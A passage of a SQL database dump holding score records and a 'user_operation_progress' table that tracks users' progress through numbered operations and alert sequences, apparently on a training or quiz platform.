(10, 34, 10, 100.00, 1, 1, 1, '2025-12-26 20:26:35'),
(11, 34, 11, 100.00, 1, 1, 1, '2025-12-26 20:28:07'),
(12, 34, 12, 100.00, 1, 1, 1, '2025-12-26 20:29:15'),
(13, 34, 32, 80.00, 5, 4, 1, '2025-12-26 20:44:41'),
(14, 34, 33, 80.00, 5, 4, 1, '2025-12-26 20:46:41'),
(15, 34, 34, 40.00, 5, 2, 0, '2025-12-26 20:47:33'),
(16, 34, 54, 100.00, 3, 3, 1, '2025-12-26 21:14:00'),
(17, 1, 771, 100.00, 3, 3, 1, '2025-12-29 13:53:27'),
(18, 42, 1, 100.00, 3, 3, 1, '2025-12-30 13:40:31'),
(19, 42, 2, 100.00, 3, 3, 1, '2025-12-30 13:41:34'),
(20, 42, 3, 100.00, 3, 3, 1, '2025-12-30 13:42:10'),
(21, 42, 4, 100.00, 3, 3, 1, '2025-12-30 13:42:41'),
(22, 42, 5, 100.00, 3, 3, 1, '2025-12-30 13:43:10'),
(23, 42, 22, 100.00, 3, 3, 1, '2025-12-30 13:45:54'),
(24, 42, 23, 100.00, 3, 3, 1, '2025-12-30 13:46:37'),
(25, 42, 24, 100.00, 3, 3, 1, '2025-12-30 13:47:42'),
(26, 42, 25, 100.00, 3, 3, 1, '2025-12-30 13:50:19'),
(27, 42, 26, 100.00, 3, 3, 1, '2025-12-30 13:51:39'),
(28, 42, 27, 100.00, 3, 3, 1, '2025-12-30 13:52:49'),
(29, 42, 28, 100.00, 3, 3, 1, '2025-12-30 13:53:51'),
(30, 65, 1, 100.00, 3, 3, 1, '2026-01-06 16:28:31'),
(31, 74, 1, 100.00, 3, 3, 1, '2026-01-12 06:32:13'),
(32, 74, 54, 100.00, 3, 3, 1, '2026-01-12 06:52:12'),
(33, 74, 2, 100.00, 3, 3, 1, '2026-01-17 08:38:34'),
(34, 74, 3, 100.00, 3, 3, 1, '2026-01-17 08:39:31'),
(35, 74, 4, 100.00, 3, 3, 1, '2026-01-17 08:40:24'),
(36, 74, 5, 100.00, 3, 3, 1, '2026-01-17 08:41:02'),
(37, 107, 2, 100.00, 3, 3, 1, '2026-02-02 15:00:17'),
(38, 107, 3, 100.00, 3, 3, 1, '2026-02-02 15:12:49'),
(39, 107, 4, 100.00, 3, 3, 1, '2026-02-02 15:17:44'),
(40, 107, 5, 100.00, 3, 3, 1, '2026-02-02 15:21:56'),
(41, 107, 1, 100.00, 3, 3, 1, '2026-02-02 15:27:10'),
(42, 34, 359, 100.00, 1, 1, 1, '2026-02-05 19:28:01'),
(43, 183, 54, 100.00, 3, 3, 1, '2026-02-20 04:23:32'),
(44, 214, 54, 100.00, 3, 3, 1, '2026-02-27 06:31:25'),
(45, 214, 55, 100.00, 3, 3, 1, '2026-02-27 06:36:08'),
(46, 232, 221, 100.00, 3, 3, 1, '2026-03-03 06:05:08'),
(47, 232, 222, 100.00, 3, 3, 1, '2026-03-04 03:50:31'),
(48, 232, 223, 100.00, 3, 3, 1, '2026-03-04 03:56:30'),
(49, 232, 224, 100.00, 3, 3, 1, '2026-03-04 04:43:37'),
(50, 232, 225, 100.00, 3, 3, 1, '2026-03-04 04:44:54'),
(51, 232, 226, 100.00, 3, 3, 1, '2026-03-04 04:52:03'),
(52, 232, 227, 100.00, 3, 3, 1, '2026-03-04 16:17:55'),
(53, 232, 228, 88.89, 9, 8, 1, '2026-03-04 16:19:09'),
(54, 237, 1, 100.00, 3, 3, 1, '2026-03-04 16:20:30'),
(55, 232, 231, 100.00, 3, 3, 1, '2026-03-05 04:02:10'),
(56, 225, 1, 100.00, 3, 3, 1, '2026-03-05 04:46:03'),
(57, 225, 2, 100.00, 3, 3, 1, '2026-03-05 04:49:22'),
(58, 225, 3, 100.00, 3, 3, 1, '2026-03-05 04:53:13'),
(59, 225, 4, 100.00, 3, 3, 1, '2026-03-05 04:55:06'),
(60, 225, 5, 100.00, 3, 3, 1, '2026-03-05 04:56:38'),
(61, 232, 232, 100.00, 3, 3, 1, '2026-03-05 05:26:14'),
(62, 232, 233, 100.00, 3, 3, 1, '2026-03-05 05:30:25'),
(63, 260, 1, 100.00, 3, 3, 1, '2026-03-07 11:50:16'),
(64, 232, 234, 100.00, 3, 3, 1, '2026-03-07 15:09:30'),
(65, 232, 235, 100.00, 3, 3, 1, '2026-03-08 09:13:57'),
(66, 260, 2, 100.00, 3, 3, 1, '2026-03-08 09:14:32'),
(67, 232, 236, 83.33, 6, 5, 1, '2026-03-08 09:15:35'),
(68, 260, 3, 100.00, 3, 3, 1, '2026-03-08 09:33:23'),
(69, 260, 4, 100.00, 3, 3, 1, '2026-03-08 09:46:06'),
(70, 232, 241, 100.00, 3, 3, 1, '2026-03-08 09:47:57'),
(71, 232, 242, 100.00, 3, 3, 1, '2026-03-08 09:50:04'),
(72, 260, 5, 100.00, 3, 3, 1, '2026-03-08 09:56:56'),
(73, 232, 243, 100.00, 3, 3, 1, '2026-03-08 10:16:50'),
(74, 232, 244, 100.00, 3, 3, 1, '2026-03-08 10:18:46'),
(75, 232, 245, 100.00, 3, 3, 1, '2026-03-08 10:21:33'),
(76, 232, 246, 100.00, 3, 3, 1, '2026-03-08 10:35:49'),
(77, 232, 247, 83.33, 6, 5, 1, '2026-03-08 10:37:56'),
(78, 232, 251, 100.00, 3, 3, 1, '2026-03-08 11:26:58'),
(79, 232, 252, 100.00, 3, 3, 1, '2026-03-08 14:19:55'),
(80, 232, 253, 100.00, 3, 3, 1, '2026-03-08 14:25:49'),
(81, 232, 254, 100.00, 3, 3, 1, '2026-03-08 14:33:28'),
(82, 232, 255, 100.00, 3, 3, 1, '2026-03-08 14:46:03'),
(83, 232, 256, 83.33, 6, 5, 1, '2026-03-08 14:47:32'),
(84, 232, 261, 100.00, 3, 3, 1, '2026-03-09 13:56:58'),
(85, 232, 262, 100.00, 3, 3, 1, '2026-03-09 13:58:29'),
(86, 232, 263, 100.00, 3, 3, 1, '2026-03-09 14:00:37'),
(87, 232, 264, 100.00, 3, 3, 1, '2026-03-09 14:03:33'),
(88, 232, 265, 100.00, 3, 3, 1, '2026-03-09 14:04:53'),
(89, 232, 266, 100.00, 3, 3, 1, '2026-03-09 14:12:51'),
(90, 232, 267, 83.33, 6, 5, 1, '2026-03-09 14:13:37'),
(91, 232, 272, 100.00, 3, 3, 1, '2026-03-09 17:37:40'),
(92, 232, 273, 100.00, 3, 3, 1, '2026-03-09 17:54:56'),
(93, 232, 274, 100.00, 3, 3, 1, '2026-03-09 18:04:05'),
(94, 232, 275, 100.00, 3, 3, 1, '2026-03-09 18:05:08'),
(95, 232, 276, 100.00, 3, 3, 1, '2026-03-09 18:06:01'),
(96, 232, 277, 100.00, 3, 3, 1, '2026-03-09 18:06:55'),
(97, 232, 278, 100.00, 6, 6, 1, '2026-03-09 18:07:53'),
(98, 232, 271, 100.00, 3, 3, 1, '2026-03-09 18:08:51'),
(99, 232, 281, 100.00, 3, 3, 1, '2026-03-09 18:09:50'),
(100, 232, 282, 100.00, 3, 3, 1, '2026-03-09 18:10:33'),
(101, 232, 283, 100.00, 3, 3, 1, '2026-03-09 18:11:19'),
(102, 232, 284, 100.00, 3, 3, 1, '2026-03-09 18:12:22'),
(103, 232, 285, 100.00, 3, 3, 1, '2026-03-09 18:13:08'),
(104, 232, 286, 100.00, 3, 3, 1, '2026-03-09 18:13:51'),
(105, 232, 287, 100.00, 6, 6, 1, '2026-03-09 18:14:24'),
(106, 232, 296, 100.00, 3, 3, 1, '2026-03-10 16:36:41'),
(107, 232, 297, 83.33, 6, 5, 1, '2026-03-10 16:37:30'),
(108, 232, 291, 100.00, 3, 3, 1, '2026-03-10 16:42:22'),
(109, 232, 292, 100.00, 3, 3, 1, '2026-03-10 16:46:21'),
(110, 232, 293, 100.00, 3, 3, 1, '2026-03-10 16:56:35'),
(111, 232, 294, 100.00, 3, 3, 1, '2026-03-10 16:58:05'),
(112, 232, 295, 100.00, 3, 3, 1, '2026-03-10 17:05:44'),
(113, 232, 301, 100.00, 3, 3, 1, '2026-03-10 17:32:44'),
(114, 232, 302, 100.00, 3, 3, 1, '2026-03-10 17:37:09'),
(115, 232, 303, 100.00, 3, 3, 1, '2026-03-10 17:40:12'),
(116, 232, 304, 100.00, 3, 3, 1, '2026-03-10 17:48:57'),
(117, 232, 305, 100.00, 3, 3, 1, '2026-03-10 17:51:34'),
(118, 232, 306, 100.00, 3, 3, 1, '2026-03-10 17:54:28'),
(119, 232, 307, 100.00, 6, 6, 1, '2026-03-10 17:54:51'),
(120, 225, 32, 100.00, 3, 3, 1, '2026-03-10 22:49:31'),
(121, 225, 33, 100.00, 3, 3, 1, '2026-03-10 22:54:36'),
(122, 225, 34, 100.00, 3, 3, 1, '2026-03-11 04:06:24'),
(123, 260, 22, 100.00, 3, 3, 1, '2026-03-11 04:52:11'),
(124, 260, 23, 100.00, 3, 3, 1, '2026-03-11 04:57:08'),
(125, 232, 311, 100.00, 3, 3, 1, '2026-03-11 16:47:51'),
(126, 232, 312, 100.00, 3, 3, 1, '2026-03-11 16:54:38'),
(127, 232, 313, 100.00, 3, 3, 1, '2026-03-11 17:07:42'),
(128, 232, 314, 100.00, 3, 3, 1, '2026-03-11 17:10:35'),
(129, 232, 315, 100.00, 3, 3, 1, '2026-03-11 17:11:59'),
(130, 232, 316, 100.00, 6, 6, 1, '2026-03-11 17:15:46'),
(131, 225, 35, 100.00, 3, 3, 1, '2026-03-12 03:20:06'),
(132, 225, 36, 100.00, 3, 3, 1, '2026-03-12 03:22:44'),
(133, 225, 37, 100.00, 3, 3, 1, '2026-03-12 04:05:07'),
(134, 225, 38, 100.00, 3, 3, 1, '2026-03-12 05:09:40'),
(135, 225, 39, 100.00, 3, 3, 1, '2026-03-12 05:13:48'),
(136, 225, 22, 100.00, 3, 3, 1, '2026-03-12 05:21:05'),
(137, 225, 23, 100.00, 3, 3, 1, '2026-03-12 05:22:49'),
(138, 225, 24, 100.00, 3, 3, 1, '2026-03-12 05:24:54'),
(139, 225, 25, 100.00, 3, 3, 1, '2026-03-12 05:28:37'),
(140, 225, 26, 100.00, 3, 3, 1, '2026-03-12 05:30:18'),
(141, 225, 27, 100.00, 3, 3, 1, '2026-03-12 05:31:38'),
(142, 225, 28, 100.00, 3, 3, 1, '2026-03-12 05:33:03'),
(143, 225, 30, 100.00, 3, 3, 1, '2026-03-12 05:34:29'),
(144, 225, 31, 90.00, 20, 18, 1, '2026-03-12 05:36:52'),
(145, 42, 350, 100.00, 1, 1, 1, '2026-03-12 11:48:00'),
(146, 283, 350, 100.00, 1, 1, 1, '2026-03-12 21:48:04'),
(147, 283, 351, 100.00, 1, 1, 1, '2026-03-12 12:26:01'),
(148, 283, 352, 100.00, 1, 1, 1, '2026-03-12 12:36:01'),
(149, 283, 353, 100.00, 1, 1, 1, '2026-03-12 12:52:02'),
(150, 283, 359, 100.00, 1, 1, 1, '2026-03-14 22:07:23'),
(151, 283, 360, 100.00, 1, 1, 1, '2026-03-14 22:07:29'),
(152, 283, 349, 100.00, 1, 1, 1, '2026-03-14 22:00:17'),
(153, 225, 40, 100.00, 3, 3, 1, '2026-03-13 02:27:17'),
(154, 225, 41, 100.00, 3, 3, 1, '2026-03-13 02:33:06'),
(155, 225, 42, 100.00, 3, 3, 1, '2026-03-13 02:35:33'),
(156, 225, 43, 100.00, 3, 3, 1, '2026-03-13 02:36:38'),
(157, 225, 44, 100.00, 3, 3, 1, '2026-03-13 02:38:02'),
(158, 225, 45, 100.00, 3, 3, 1, '2026-03-13 02:39:30'),
(159, 225, 46, 100.00, 3, 3, 1, '2026-03-13 02:41:07'),
(160, 225, 47, 95.00, 20, 19, 1, '2026-03-13 02:43:55'),
(161, 225, 349, 100.00, 1, 1, 1, '2026-03-13 03:00:01'),
(162, 225, 350, 100.00, 1, 1, 1, '2026-03-13 03:04:01'),
(163, 225, 351, 100.00, 1, 1, 1, '2026-03-13 03:31:03'),
(164, 42, 54, 0.00, 3, 0, 0, '2026-03-13 10:09:26'),
(165, 232, 324, 100.00, 3, 3, 1, '2026-03-13 16:06:33'),
(166, 232, 325, 100.00, 3, 3, 1, '2026-03-13 16:09:15'),
(167, 232, 326, 83.33, 6, 5, 1, '2026-03-13 16:10:25'),
(168, 232, 321, 100.00, 3, 3, 1, '2026-03-13 16:15:55'),
(169, 232, 322, 100.00, 3, 3, 1, '2026-03-13 16:17:25'),
(170, 232, 323, 100.00, 3, 3, 1, '2026-03-13 16:18:41'),
(171, 232, 331, 100.00, 3, 3, 1, '2026-03-14 04:50:03'),
(172, 232, 332, 100.00, 3, 3, 1, '2026-03-14 04:52:42'),
(173, 232, 333, 100.00, 3, 3, 1, '2026-03-14 04:56:28'),
(174, 232, 334, 100.00, 3, 3, 1, '2026-03-14 04:57:45'),
(175, 232, 335, 100.00, 3, 3, 1, '2026-03-14 04:58:49'),
(176, 232, 336, 100.00, 6, 6, 1, '2026-03-14 04:59:17'),
(177, 232, 341, 100.00, 3, 3, 1, '2026-03-14 05:01:01'),
(178, 232, 342, 100.00, 3, 3, 1, '2026-03-14 05:02:11'),
(179, 232, 343, 100.00, 3, 3, 1, '2026-03-14 05:03:17'),
(180, 232, 344, 100.00, 3, 3, 1, '2026-03-14 05:03:58'),
(181, 232, 345, 100.00, 3, 3, 1, '2026-03-14 05:04:34'),
(182, 232, 346, 100.00, 6, 6, 1, '2026-03-14 05:05:01'),
(183, 232, 364, 85.00, 1, 1, 1, '2026-03-15 15:55:44'),
(184, 225, 352, 100.00, 1, 1, 1, '2026-03-15 10:41:01'),
(185, 225, 353, 100.00, 1, 1, 1, '2026-03-15 10:51:00'),
(186, 260, 24, 100.00, 3, 3, 1, '2026-03-15 13:50:58'),
(187, 260, 25, 100.00, 3, 3, 1, '2026-03-15 14:01:10'),
(188, 260, 26, 100.00, 3, 3, 1, '2026-03-15 14:12:56'),
(189, 232, 365, 100.00, 1, 1, 1, '2026-03-15 17:12:24'),
(190, 260, 27, 100.00, 3, 3, 1, '2026-03-15 16:04:37'),
(191, 260, 28, 100.00, 3, 3, 1, '2026-03-15 16:15:06'),
(192, 260, 30, 100.00, 3, 3, 1, '2026-03-15 16:29:36'),
(193, 260, 31, 80.00, 20, 16, 1, '2026-03-15 16:59:18'),
(194, 232, 361, 100.00, 1, 1, 1, '2026-03-15 17:12:38'),
(195, 303, 221, 100.00, 3, 3, 1, '2026-03-15 17:37:43'),
(196, 232, 362, 100.00, 1, 1, 1, '2026-03-15 18:20:37'),
(197, 260, 40, 100.00, 3, 3, 1, '2026-03-15 18:10:50'),
(198, 232, 363, 100.00, 1, 1, 1, '2026-03-15 18:20:42'),
(199, 232, 366, 100.00, 1, 1, 1, '2026-03-15 18:20:01'),
(200, 260, 41, 100.00, 3, 3, 1, '2026-03-15 18:24:14'),
(201, 260, 42, 100.00, 3, 3, 1, '2026-03-15 18:57:22'),
(202, 260, 43, 100.00, 3, 3, 1, '2026-03-15 19:44:15'),
(203, 260, 44, 100.00, 3, 3, 1, '2026-03-15 20:23:12'),
(204, 260, 45, 100.00, 3, 3, 1, '2026-03-15 20:44:14'),
(205, 260, 46, 100.00, 3, 3, 1, '2026-03-15 21:16:41'),
(206, 260, 47, 100.00, 20, 20, 1, '2026-03-15 21:27:59'),
(207, 225, 359, 100.00, 1, 1, 1, '2026-03-16 02:59:00'),
(208, 225, 360, 100.00, 1, 1, 1, '2026-03-16 03:07:01'),
(209, 225, 367, 100.00, 1, 1, 1, '2026-03-16 03:19:04');

-- --------------------------------------------------------

--
-- Table structure for table `user_operation_progress`
--

CREATE TABLE `user_operation_progress` (
  `id` int(11) NOT NULL,
  `user_id` int(11) NOT NULL,
  `operation_id` int(11) NOT NULL,
  `current_alert_sequence` int(11) DEFAULT 1,
  `started_at` timestamp NOT NULL DEFAULT current_timestamp(),
  `completed_at` timestamp NULL DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;

--
-- Dumping data for table `user_operation_progress`
--

INSERT INTO `user_operation_progress` (`id`, `user_id`, `operation_id`, `current_alert_sequence`, `started_at`, `completed_at`) VALUES
(1, 34, 1, 3, '2025-12-31 13:11:32', NULL),
(2, 34, 7, 2, '2026-01-02 04:31:15', NULL),
(3, 1, 37, 1, '2026-01-05 03:22:25', NULL),
(4, 34, 37, 2, '2026-01-06 00:53:10', NULL),
(5, 1, 47, 1, '2026-01-06 01:49:25', NULL),
(6, 1, 48, 1, '2026-01-06 19:45:51', NULL),
(7, 68, 48, 4, '2026-01-07 16:11:48', NULL),
(8, 34, 48, 1, '2026-01-11 01:35:25', NULL),
(9, 34, 51, 1, '2026-01-11 01:38:00', NULL),
(10, 74, 1, 1, '2026-01-12 06:24:54', NULL),
(11, 74, 64, 1, '2026-01-12 06:43:33', NULL),
(12, 74, 60, 1, '2026-01-12 06:46:32', NULL),
(13, 78, 1, 1, '2026-01-14 03:22:08', NULL),
(14, 74, 72, 1, '2026-01-14 06:36:01', NULL),
(15, 85, 1, 1, '2026-01-16 13:33:40', NULL),
(16, 34, 63, 1, '2026-01-16 23:27:28', '2026-01-16 23:28:03'),
(17, 54, 1, 3, '2026-01-17 03:00:58', NULL),
(18, 74, 93, 3, '2026-01-17 08:47:02', NULL),
(19, 52, 1, 1, '2026-01-19 08:45:34', NULL),
(20, 91, 1, 1, '2026-01-20 10:38:53', NULL),
(21, 93, 1, 2, '2026-01-20 20:57:32', NULL),
(22, 94, 1, 1, '2026-01-21 01:57:29', NULL),
(23, 95, 1, 2, '2026-01-21 17:18:27', NULL),
(24, 96, 1, 1, '2026-01-22 04:14:25', NULL),
(25, 56, 1, 1, '2026-01-23 06:03:09', NULL),
(26, 42, 1, 1, '2026-01-23 08:19:36', NULL),
(27, 97, 1, 1, '2026-01-25 05:05:04', NULL),
(28, 98, 1, 1, '2026-01-25 08:18:38', NULL),
(29, 99, 1, 1, '2026-01-25 15:14:16', NULL),
(30, 102, 1, 1, '2026-01-25 21:55:00', NULL),
(31, 34, 46, 1, '2026-01-26 03:04:08', '2026-02-11 03:06:48'),
(32, 1, 103, 1, '2026-01-27 02:09:47', NULL),
(33, 107, 1, 1, '2026-01-27 19:45:55', NULL),
(34, 108, 1, 1, '2026-01-27 19:55:53', NULL),
(35, 109, 1, 1, '2026-01-27 21:08:02', NULL),
(36, 34, 76, 1, '2026-01-31 04:16:18', '2026-01-31 04:16:33'),
(37, 115, 1, 1, '2026-01-31 12:38:02', NULL),
(38, 116, 1, 1, '2026-02-01 09:07:07', NULL),
(39, 116, 115, 2, '2026-02-01 09:11:43', NULL),
(40, 123, 1, 1, '2026-02-02 10:07:03', NULL),
(41, 124, 1, 1, '2026-02-02 10:09:53', NULL),
(42, 125, 1, 1, '2026-02-04 01:34:01', NULL),
(43, 126, 1, 1, '2026-02-04 22:06:35', NULL),
(44, 65, 1, 1, '2026-02-05 16:49:25', NULL),
(45, 127, 1, 1, '2026-02-05 17:48:46', NULL),
(46, 128, 1, 1, '2026-02-07 01:17:23', NULL),
(47, 129, 1, 1, '2026-02-07 21:51:46', NULL),
(48, 131, 1, 1, '2026-02-08 08:16:29', NULL),
(49, 133, 1, 1, '2026-02-08 16:07:44', NULL),
(50, 135, 1, 1, '2026-02-08 17:42:27', NULL),
(51, 136, 1, 1, '2026-02-09 22:07:29', NULL),
(52, 137, 1, 1, '2026-02-10 12:44:50', NULL),
(53, 34, 46, 1, '2026-02-11 03:06:15', '2026-02-11 03:06:48'),
(54, 138, 1, 2, '2026-02-11 17:02:53', NULL),
(55, 140, 1, 3, '2026-02-11 17:05:54', NULL),
(56, 141, 1, 1, '2026-02-12 03:16:23', NULL),
(57, 34, 19, 1, '2026-02-13 01:42:45', '2026-02-13 01:43:55'),
(58, 78, 30, 1, '2026-02-13 18:54:36', '2026-02-13 18:54:55'),
(59, 118, 99, 1, '2026-02-13 19:35:23', NULL),
(60, 1, 43, 1, '2026-02-13 23:18:41', NULL),
(61, 142, 1, 2, '2026-02-14 06:28:27', NULL),
(62, 142, 142, 5, '2026-02-14 06:32:08', '2026-02-14 06:32:08'),
(63, 145, 136, 1, '2026-02-14 09:37:08', NULL),
(64, 146, 14, 1, '2026-02-14 15:55:35', NULL),
(65, 147, 93, 1, '2026-02-14 16:15:39', '2026-02-14 16:16:20'),
(66, 149, 145, 1, '2026-02-14 17:56:15', NULL),
(67, 150, 79, 1, '2026-02-14 18:36:43', NULL),
(68, 151, 19, 1, '2026-02-14 19:17:56', NULL),
(69, 109, 56, 1, '2026-02-14 22:49:58', '2026-02-14 22:51:58'),
(70, 152, 118, 1, '2026-02-15 01:20:47', NULL),
(71, 153, 1, 1, '2026-02-15 01:39:11', NULL),
(72, 154, 116, 1, '2026-02-15 03:41:10', '2026-02-15 03:41:24'),
(73, 148, 1, 1, '2026-02-15 04:20:47', '2026-02-15 04:23:04'),
(74, 99, 80, 1, '2026-02-15 04:37:19', NULL),
(75, 156, 19, 1, '2026-02-15 20:44:15', NULL),
(76, 158, 8, 1, '2026-02-15 23:21:40', '2026-02-15 23:23:25'),
(77, 159, 1, 1, '2026-02-15 23:22:22', NULL),
(78, 109, 109, 1, '2026-02-15 23:26:01', '2026-02-15 23:28:14'),
(79, 160, 145, 1, '2026-02-15 23:40:46', '2026-02-15 23:41:56'),
(80, 102, 145, 1, '2026-02-16 02:43:25', NULL),
(82, 60, 1, 1, '2026-02-16 06:05:50', NULL),
(83, 164, 61, 1, '2026-02-16 14:54:21', '2026-02-16 14:54:37'),
(84, 165, 3, 1, '2026-02-16 17:15:55', '2026-02-16 17:17:14'),
(85, 99, 25, 1, '2026-02-16 17:17:59', '2026-02-16 17:20:58'),
(86, 165, 1, 1, '2026-02-16 17:39:33', NULL),
(87, 45, 1, 1, '2026-02-17 02:54:23', NULL),
(88, 34, 12, 1, '2026-02-17 03:28:12', NULL),
(89, 165, 82, 1, '2026-02-17 05:23:36', '2026-02-17 05:24:12'),
(90, 78, 81, 1, '2026-02-17 05:59:04', NULL),
(91, 166, 1, 1, '2026-02-17 15:29:09', NULL),
(92, 109, 59, 1, '2026-02-17 15:43:00', '2026-02-17 15:45:26'),
(93, 108, 143, 1, '2026-02-17 17:17:01', NULL),
(94, 112, 52, 1, '2026-02-17 20:47:45', NULL),
(95, 157, 1, 1, '2026-02-17 22:29:14', NULL),
(96, 119, 54, 1, '2026-02-17 23:50:59', NULL),
(97, 78, 7, 1, '2026-02-18 02:24:52', '2026-02-18 02:25:05'),
(98, 168, 84, 1, '2026-02-18 06:47:55', NULL),
(99, 169, 1, 5, '2026-02-18 07:17:18', '2026-02-18 07:27:51'),
(100, 169, 2, 4, '2026-02-18 07:28:06', '2026-02-18 07:31:05'),
(101, 169, 3, 4, '2026-02-18 07:31:21', '2026-02-18 07:36:03'),
(102, 169, 4, 4, '2026-02-18 07:36:11', NULL),
(103, 170, 1, 1, '2026-02-18 08:19:53', NULL),
(104, 171, 1, 1, '2026-02-18 09:49:56', NULL),
(105, 172, 36, 1, '2026-02-18 11:06:12', NULL),
(106, 173, 44, 1, '2026-02-18 12:16:17', '2026-02-18 12:17:21'),
(107, 109, 81, 1, '2026-02-18 13:56:43', '2026-02-18 13:58:20'),
(108, 174, 99, 1, '2026-02-18 15:07:23', '2026-02-18 15:09:51'),
(109, 175, 22, 1, '2026-02-18 15:41:24', '2026-02-18 15:43:57'),
(110, 165, 131, 1, '2026-02-18 17:08:15', '2026-02-18 17:08:57'),
(111, 176, 113, 1, '2026-02-19 03:47:20', '2026-02-19 03:48:49'),
(112, 177, 114, 1, '2026-02-19 04:07:13', '2026-02-19 04:09:38'),
(113, 178, 1, 1, '2026-02-19 05:19:23', NULL),
(114, 177, 1, 5, '2026-02-19 14:40:27', '2026-02-22 11:08:36'),
(115, 180, 89, 1, '2026-02-19 15:51:29', '2026-02-19 15:52:17'),
(116, 109, 104, 1, '2026-02-19 16:01:54', '2026-02-19 16:03:27'),
(117, 175, 89, 1, '2026-02-20 02:17:31', '2026-02-20 13:03:09'),
(118, 34, 42, 1, '2026-02-20 02:50:13', NULL),
(119, 181, 1, 1, '2026-02-20 03:05:11', NULL),
(120, 183, 1, 1, '2026-02-20 03:55:15', NULL),
(121, 184, 1, 3, '2026-02-20 08:05:25', NULL),
(122, 185, 1, 1, '2026-02-20 08:58:30', NULL),
(123, 186, 69, 1, '2026-02-20 16:30:51', '2026-02-20 16:31:27'),
(124, 187, 136, 1, '2026-02-21 03:07:23', '2026-02-21 03:09:46'),
(125, 187, 1, 1, '2026-02-21 03:11:46', NULL),
(126, 109, 90, 1, '2026-02-21 18:50:03', '2026-02-21 18:51:37'),
(127, 189, 1, 5, '2026-02-21 19:38:33', '2026-02-21 22:29:17'),
(128, 188, 120, 1, '2026-02-21 20:50:44', '2026-02-21 20:52:51'),
(129, 189, 2, 4, '2026-02-21 22:30:34', '2026-02-22 00:38:38'),
(130, 189, 3, 4, '2026-02-22 00:40:04', '2026-02-23 02:15:23'),
(131, 177, 74, 1, '2026-02-22 05:05:18', '2026-02-22 05:10:43'),
(132, 177, 15, 5, '2026-02-22 10:33:25', '2026-02-22 10:44:48'),
(133, 177, 2, 1, '2026-02-22 11:08:55', NULL),
(134, 193, 81, 1, '2026-02-22 18:25:25', NULL),
(135, 112, 10, 1, '2026-02-23 01:29:59', NULL),
(136, 189, 4, 4, '2026-02-23 02:15:42', '2026-02-23 03:12:26'),
(137, 189, 5, 5, '2026-02-23 03:12:43', '2026-02-27 02:46:10'),
(138, 194, 10, 1, '2026-02-23 03:20:45', NULL),
(139, 165, 78, 1, '2026-02-23 06:34:21', NULL),
(140, 177, 7, 1, '2026-02-23 10:45:30', '2026-02-23 10:50:10'),
(141, 180, 59, 1, '2026-02-23 11:36:26', '2026-02-23 11:37:01'),
(142, 195, 113, 1, '2026-02-23 16:01:00', NULL),
(143, 196, 139, 1, '2026-02-23 17:35:14', '2026-02-23 17:37:08'),
(144, 177, 93, 1, '2026-02-23 21:05:40', '2026-02-23 21:09:50'),
(145, 198, 1, 1, '2026-02-23 23:51:06', NULL),
(146, 199, 1, 1, '2026-02-23 23:52:05', NULL),
(147, 196, 88, 1, '2026-02-24 03:21:41', '2026-02-24 03:23:28'),
(148, 202, 58, 1, '2026-02-24 15:35:45', '2026-02-24 15:37:55'),
(149, 78, 115, 1, '2026-02-24 16:01:03', NULL),
(150, 182, 90, 1, '2026-02-24 18:45:27', NULL),
(151, 203, 19, 1, '2026-02-24 19:50:13', NULL),
(152, 165, 11, 1, '2026-02-24 19:51:32', NULL),
(153, 204, 57, 1, '2026-02-24 20:48:39', NULL),
(155, 180, 46, 1, '2026-02-25 09:53:00', '2026-02-25 09:53:22'),
(156, 208, 51, 1, '2026-02-25 10:32:34', '2026-02-25 10:40:02'),
(157, 209, 1, 1, '2026-02-25 11:04:36', NULL),
(158, 177, 112, 1, '2026-02-25 12:03:44', '2026-02-25 12:05:36'),
(159, 174, 86, 1, '2026-02-26 04:33:35', '2026-02-26 04:39:34'),
(160, 174, 1, 1, '2026-02-26 04:41:54', NULL),
(161, 109, 6, 1, '2026-02-26 05:34:29', NULL),
(162, 195, 10, 1, '2026-02-26 07:41:11', '2026-02-26 07:42:54'),
(163, 99, 140, 1, '2026-02-26 15:01:13', '2026-02-26 15:06:18'),
(164, 213, 1, 5, '2026-02-26 21:11:50', '2026-02-26 21:35:25'),
(165, 213, 2, 4, '2026-02-26 21:35:33', '2026-02-26 21:43:14'),
(166, 210, 1, 1, '2026-02-26 21:36:40', NULL),
(167, 213, 3, 4, '2026-02-26 21:43:21', '2026-02-26 21:47:43'),
(168, 213, 4, 4, '2026-02-26 21:47:47', '2026-02-26 21:54:38'),
(169, 213, 5, 1, '2026-02-26 21:54:45', NULL),
(170, 189, 6, 4, '2026-02-27 02:46:32', '2026-02-27 02:57:42'),
(171, 189, 7, 5, '2026-02-27 02:57:56', '2026-03-04 01:54:55'),
(172, 209, 102, 1, '2026-02-27 04:00:53', '2026-02-27 04:02:21'),
(173, 214, 1, 1, '2026-02-27 06:14:06', NULL),
(174, 196, 7, 1, '2026-02-27 06:47:08', '2026-02-27 06:49:04'),
(175, 196, 1, 5, '2026-02-27 06:52:53', '2026-02-27 07:06:44'),
(176, 196, 2, 1, '2026-02-27 07:06:58', NULL),
(177, 99, 107, 1, '2026-02-27 15:43:48', '2026-02-27 15:49:29'),
(178, 217, 1, 1, '2026-03-01 03:17:30', NULL),
(179, 223, 1, 1, '2026-03-01 15:51:16', NULL),
(180, 224, 1, 1, '2026-03-01 15:54:55', NULL),
(181, 177, 111, 1, '2026-03-01 21:46:27', '2026-03-01 21:49:08'),
(182, 225, 1, 3, '2026-03-02 01:00:00', NULL),
(183, 225, 1, 3, '2026-03-02 05:24:48', NULL),
(184, 226, 1, 1, '2026-03-02 05:27:10', NULL),
(185, 225, 1, 3, '2026-03-02 05:27:39', NULL),
(186, 225, 1, 3, '2026-03-02 05:29:01', NULL),
(187, 228, 99, 1, '2026-03-02 12:00:21', NULL),
(188, 109, 78, 1, '2026-03-02 12:23:27', '2026-03-02 12:24:36'),
(189, 229, 1, 2, '2026-03-02 15:05:11', NULL),
(190, 220, 140, 1, '2026-03-02 20:08:33', NULL),
(191, 231, 146, 1, '2026-03-02 20:16:34', '2026-03-02 20:20:57'),
(192, 232, 1, 5, '2026-03-03 03:14:28', '2026-03-07 13:56:20'),
(193, 230, 43, 1, '2026-03-03 04:59:35', '2026-03-03 05:03:10'),
(194, 177, 13, 1, '2026-03-03 08:32:24', '2026-03-03 08:34:38'),
(195, 178, 159, 3, '2026-03-03 08:42:53', NULL),
(196, 178, 159, 3, '2026-03-03 08:44:54', NULL),
(197, 178, 159, 3, '2026-03-03 08:46:47', NULL),
(198, 233, 1, 1, '2026-03-03 09:48:25', NULL),
